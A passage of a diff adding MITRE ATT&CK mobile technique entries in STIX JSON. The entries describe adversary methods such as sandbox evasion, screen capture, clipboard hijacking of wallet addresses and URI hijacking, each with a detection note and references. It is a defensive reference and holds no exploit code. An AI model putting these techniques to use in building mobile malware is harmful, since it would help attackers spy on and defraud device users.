"Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nHardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "created": "2022-03-30T17:53:35.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633/001", + "external_id": "T1633.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:16.029Z", + "name": "Stored Application Data", + "description": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) \n\n \n\nDue to mobile OS sandboxing, this technique is only possible in three scenarios: \n\n \n\n* An application stores files in unprotected external storage \n* An application stores files in its internal storage directory with insecure permissions (e.g. 777) \n* The adversary gains root permissions on the device ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "created": "2017-10-25T14:48:15.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1409", + "external_id": "T1409" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html", + "external_id": "AUT-0" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:57:43.022Z", + "name": "Screen Capture", + "description": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can view a list of apps with accessibility service privileges in the device settings. Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "created": "2019-08-08T18:34:14.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1513", + "external_id": "T1513" + }, + { + "source_name": "Android ScreenCap2 2019", + "description": "Android Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.", + "url": "https://developer.android.com/studio/command-line/adb" + }, + { + "source_name": "Android ScreenCap1 2019", + "description": "Android Developers. (n.d.). Android MediaProjectionManager. Retrieved August 8, 2019.", + "url": "https://developer.android.com/reference/android/media/projection/MediaProjectionManager" + }, + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + }, + { + "source_name": "Fortinet screencap July 2019", + "description": "Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.", + "url": "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html" + }, + { + "source_name": "Trend Micro ScreenCap July 2015", + "description": "Zhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved August 8, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html", + "external_id": "APP-40" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:44:26.748Z", + "name": "Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.\n\nOne method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the `ClipboardManager.OnPrimaryClipChangedListener` interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.\n\nAdversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.\n\n[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Applications could be vetted for their use of the clipboard manager APIs with extra scrutiny given to application that make use of them.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "created": "2022-04-06T13:39:39.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1641/001", + "external_id": "T1641.001" + }, + { + "source_name": "ESET Clipboard Modification February 2019", + "description": "ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019.", + "url": "https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "created": "2017-10-25T14:48:07.460Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1452", + "url": "https://attack.mitre.org/techniques/T1452" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).", + "modified": "2022-04-06T13:57:24.726Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Manipulate App Store Rankings or Ratings", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--77e30eee-fd48-40b4-99ec-73e97c158b58", + "created": "2017-10-25T14:48:32.008Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1416", + "url": "https://attack.mitre.org/techniques/T1416" + }, + { + "source_name": "Trend Micro iOS URL Hijacking", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.\n\nApplications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)", + "modified": "2022-04-01T15:17:21.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "URI Hijacking", + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:28:54.940Z", + "name": "Compromise Software Dependencies and Development Tools", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "created": "2022-03-28T19:31:51.978Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474/001", + "external_id": "T1474.001" + }, + { + "source_name": "Grace-Advertisement", + "description": "M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.", + "url": "https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html", + "external_id": "APP-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html", + "external_id": "SPC-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html", + "external_id": "SPC-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html", + "external_id": "SPC-9" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html", + "external_id": "SPC-10" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html", + "external_id": "SPC-15" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--786f488c-cb1f-4602-89c5-86d982ee326b", + "created": "2019-10-02T14:46:43.632Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1523", + "url": "https://attack.mitre.org/techniques/T1523" + }, + { + "source_name": "Sophos Anti-emulation", + "url": "https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/", + "description": "Chen Yu et al. . (2017, April 13). Android malware anti-emulation techniques. Retrieved October 2, 2019." + }, + { + "source_name": "Xiao-ZergHelper", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016." + }, + { + "source_name": "Cyberscoop Evade Analysis January 2019", + "url": "https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/", + "description": "Jeff Stone. (2019, January 18). Sneaky motion-detection feature found on Android malware. Retrieved October 2, 2019." + }, + { + "source_name": "ThreatFabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019." + }, + { + "source_name": "Github Anti-emulator", + "url": "https://github.com/strazzere/anti-emulator", + "description": "Tim Strazzere. (n.d.). Android Anti-Emulator. Retrieved October 2, 2019." + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. \nAdversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access `android.os.SystemProperties` via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)\n", + "modified": "2022-03-30T17:54:56.590Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Evade Analysis Environment", + "x_mitre_detection": "Analysis Environment avoidance capabilities can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:43:49.443Z", + "name": "URI Hijacking", + "description": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. \n\nApplications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_contributors": [ + "Leo Zhang, Trend Micro", + "Steven Du, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "created": "2022-04-01T15:15:35.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635/001", + "external_id": "T1635.001" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Trend Micro iOS URL Hijacking", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/" + }, + { + "source_name": "IETF-PKCE", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016.", + "url": "https://tools.ietf.org/html/rfc7636" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:52:52.097Z", + "name": "Subvert Trust Controls", + "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications. \n\nOn iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "created": "2022-03-30T18:05:46.795Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1632", + "external_id": "T1632" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "external_id": "STA-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "created": "2017-10-25T14:48:11.116Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1433", + "url": "https://attack.mitre.org/techniques/T1433" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.\n\nOn iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.", + "modified": "2022-04-01T13:14:43.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Call Log", + "x_mitre_detection": "On Android 6.0 and up, the user can view which applications have permission to access call log information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8197f026-64da-4700-93b9-b55ba55f3b31", + "created": "2020-09-11T15:04:14.532Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1581", + "url": "https://attack.mitre.org/techniques/T1581" + }, + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + }, + { + "source_name": "Apple Location Services", + "url": "https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services", + "description": "Apple. (n.d.). Requesting Authorization for Location Services. Retrieved September 11, 2020." + }, + { + "source_name": "Android Geofencing API", + "url": "https://developer.android.com/training/location/geofencing", + "description": "Google. (n.d.). Create and monitor geofences. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)\n\n[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.\n\nOne method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection.(Citation: Android Geofencing API)\n\nSimilarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.(Citation: Apple Location Services)\n\n[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or advertisements.", + "modified": "2022-03-30T20:43:31.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Geofencing", + "x_mitre_detection": "Users can review which applications have location permissions in the operating system’s settings menu. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--82f04b1e-5371-4a6f-be06-411f0f43b483", + "created": "2017-10-25T14:48:29.774Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1401", + "url": "https://attack.mitre.org/techniques/T1401" + }, + { + "source_name": "Android DeviceAdminInfo", + "url": "https://developer.android.com/reference/android/app/admin/DeviceAdminInfo", + "description": "Google. (n.d.). 